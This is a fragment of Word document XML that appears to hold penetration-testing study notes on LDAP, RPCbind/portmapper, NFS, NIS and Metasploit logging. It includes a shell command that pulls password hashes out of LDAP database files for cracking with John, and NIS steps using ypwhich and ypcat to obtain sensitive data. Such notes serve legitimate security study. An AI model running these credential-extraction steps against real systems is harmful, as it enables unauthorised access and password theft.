    </w:p>
    <w:p w14:paraId="42051DD2" w14:textId="77777777" w:rsidR="00580173" w:rsidRPr="00580173" w:rsidRDefault="00580173" w:rsidP="00580173">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00580173">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Netscape Directory Server 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5955CD31" w14:textId="55CF612E" w:rsidR="00580173" w:rsidRPr="00580173" w:rsidRDefault="00580173" w:rsidP="00580173">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00580173">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Nsslapd.sas_at.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BADAAB7" w14:textId="77777777" w:rsidR="00580173" w:rsidRPr="00580173" w:rsidRDefault="00580173" w:rsidP="00580173">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00580173">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>nsslapd.sas_oc.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607B071E" w14:textId="77777777" w:rsidR="00580173" w:rsidRPr="00580173" w:rsidRDefault="00580173" w:rsidP="00580173">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00580173">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>OpenLDAP directory server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACD0587" w14:textId="77777777" w:rsidR="00580173" w:rsidRPr="00580173" w:rsidRDefault="00580173" w:rsidP="00580173">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00580173">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>slapd.sas_at.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565A0101" w14:textId="77777777" w:rsidR="00580173" w:rsidRPr="00580173" w:rsidRDefault="00580173" w:rsidP="00580173">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00580173">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>slapd.sas_oc.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E57208" w14:textId="77777777" w:rsidR="00580173" w:rsidRPr="00580173" w:rsidRDefault="00580173" w:rsidP="00580173">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00580173">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Sun ONE Directory Server 5.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3935BDB5" w14:textId="5E54819C" w:rsidR="00580173" w:rsidRDefault="00580173" w:rsidP="00580173">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00580173">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>75sas.ldif</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C74659" w14:textId="77777777" w:rsidR="00580173" w:rsidRDefault="00580173" w:rsidP="00580173">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1729F411" w14:textId="79E67E26" w:rsidR="00B9353F" w:rsidRDefault="00B9353F" w:rsidP="00B9353F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Post DB Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E6BA9D" w14:textId="01DF88A6" w:rsidR="00B9353F" w:rsidRDefault="00B9353F" w:rsidP="00B9353F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>/var/lib/ldap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0298AFD3" w14:textId="30DE453F" w:rsidR="00B9353F" w:rsidRDefault="00B9353F" w:rsidP="00B9353F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>You can access the files where the databases are contained (could be in /var/lib/ldap)</w:t>
      </w:r>
      <w:r w:rsidR="000D3A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and extract hashes using the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308264F9" w14:textId="06AFB77C" w:rsidR="000D3A47" w:rsidRDefault="000D3A47" w:rsidP="00B9353F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D3A47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>cat /var/lib/ldap/*.bdb | grep -i -a -E -o "description.*" | sort | uniq -u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE10D22" w14:textId="52A00CB2" w:rsidR="000D3A47" w:rsidRDefault="000D3A47" w:rsidP="00B9353F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Feed the password hash into Jo</w:t>
      </w:r>
      <w:r w:rsidR="00580173">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>hn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B718E3" w14:textId="77777777" w:rsidR="008113CB" w:rsidRDefault="008113CB" w:rsidP="008113CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23CE1E1D" w14:textId="64BE0B48" w:rsidR="008113CB" w:rsidRDefault="00EF481A" w:rsidP="00EF481A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>PORTMAPPER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396AA451" w14:textId="77777777" w:rsidR="00C816AC" w:rsidRDefault="00C816AC" w:rsidP="00EF481A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7336A828" w14:textId="6DC585B7" w:rsidR="00C816AC" w:rsidRDefault="00E309C4" w:rsidP="00E309C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Port 111 – RPCBIND</w:t>
      </w:r>
      <w:r w:rsidR="001A04DF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, PORTMAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Also </w:t>
      </w:r>
      <w:r w:rsidR="008A507C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>32771 in Oracle Solaris</w:t>
      </w:r>
      <w:r w:rsidR="002750FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469E2A40" w14:textId="77777777" w:rsidR="002C752D" w:rsidRDefault="00324551" w:rsidP="002750FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Essentially</w:t>
      </w:r>
      <w:r w:rsidR="001A04DF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, it maps ONC RPC program numbers to the network port number for that version of that program. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8FB05E" w14:textId="43D111A1" w:rsidR="002750FB" w:rsidRDefault="00687700" w:rsidP="002750FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">It will </w:t>
      </w:r>
      <w:r w:rsidR="009430A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">also tell the specific protocol that is used for that </w:t>
      </w:r>
      <w:r w:rsidR="002C752D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>program. (TCP/UDP)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53709390" w14:textId="17329431" w:rsidR="002C752D" w:rsidRDefault="002C752D" w:rsidP="002C752D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Portmap </w:t>
      </w:r>
      <w:r w:rsidR="00B532C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>has been used</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> primarily</w:t>
      </w:r>
      <w:r w:rsidR="00B532C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the past</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> for DOS and DDOS attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BC0BBF" w14:textId="78AC1106" w:rsidR="00500D40" w:rsidRDefault="00500D40" w:rsidP="00500D40">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4936E69D" w14:textId="77777777" w:rsidR="00500D40" w:rsidRDefault="00500D40" w:rsidP="00500D40">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AB362DF" w14:textId="324D2278" w:rsidR="00500D40" w:rsidRDefault="00500D40" w:rsidP="00500D40">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>RPCBind + NFS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F78E3D" w14:textId="6E9CB4A6" w:rsidR="00500D40" w:rsidRDefault="00500D40" w:rsidP="00500D40">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>If the service NFS is running, we could potentially list and download (and even upload) files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7FE7B9" w14:textId="77777777" w:rsidR="00D91B7E" w:rsidRPr="00500D40" w:rsidRDefault="00D91B7E" w:rsidP="00500D40">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="787AA3F7" w14:textId="77777777" w:rsidR="008A507C" w:rsidRDefault="008A507C" w:rsidP="008A507C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4363ACC1" w14:textId="0E5F6CA2" w:rsidR="00D91B7E" w:rsidRDefault="00D91B7E" w:rsidP="008A507C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>NIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425DA7EF" w14:textId="1ED9B8BA" w:rsidR="00D91B7E" w:rsidRDefault="00D91B7E" w:rsidP="00D91B7E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>IF the service “ypbind” is running, we could exploit it with the following procedure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAF2E4A" w14:textId="06F1558D" w:rsidR="00D91B7E" w:rsidRDefault="00D91B7E" w:rsidP="00D91B7E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Guess the NIS “domain name” of the machine</w:t>
      </w:r>
      <w:r w:rsidR="00C95709">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (this is required to exploit NIS.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3A528E" w14:textId="70CA4D0E" w:rsidR="00C95709" w:rsidRDefault="00C95709" w:rsidP="00D91B7E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Use “ypwhich” command to ping the NIS server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07263A31" w14:textId="2B2BFF95" w:rsidR="00C95709" w:rsidRDefault="00C904BC" w:rsidP="00D91B7E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Use “ypcat” to obtain sensitive material.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDDB526" w14:textId="35E76B9E" w:rsidR="00C904BC" w:rsidRDefault="003334CD" w:rsidP="00C904BC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003334CD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A184A38" wp14:editId="1E87AD7F">
            <wp:extent cx="5943600" cy="2016125"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1761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47" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2016125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F310F6" w14:textId="77777777" w:rsidR="00C904BC" w:rsidRPr="00C904BC" w:rsidRDefault="00C904BC" w:rsidP="00C904BC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02DF8ACA" w14:textId="77777777" w:rsidR="008A507C" w:rsidRPr="008A507C" w:rsidRDefault="008A507C" w:rsidP="008A507C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23D9C510" w14:textId="77777777" w:rsidR="008113CB" w:rsidRPr="008113CB" w:rsidRDefault="008113CB" w:rsidP="008113CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B2FE625" w14:textId="056C5DB8" w:rsidR="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>METASPLOIT CRASH COURSE (by Jenna)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A8F334" w14:textId="2A31883D" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>script [filename]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A86F911" w14:textId="7AD71B49" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>starts logging console you are in fully</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370DDFA9" w14:textId="4665C984" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>tmux logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4A321C" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01D77936" w14:textId="2C7B0482" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>prompt, promtChar, promptTimeFormat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D550F40" w14:textId="0668BAE8" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>helps show sessions and time so it records in logging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0336E1FF" w14:textId="77777777" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72C808FE" w14:textId="3616FBAB" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3D1E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>dbimport - importing an xml file to msf and other file types too.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0DF95F" w14:textId="4CE91B36" w:rsidR="007B3D1E" w:rsidRPr="007B3D1E" w:rsidRDefault="007B3D1E" w:rsidP="007B3D1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Look into Nessus</w:t>
      </w:r>
    </w:p>
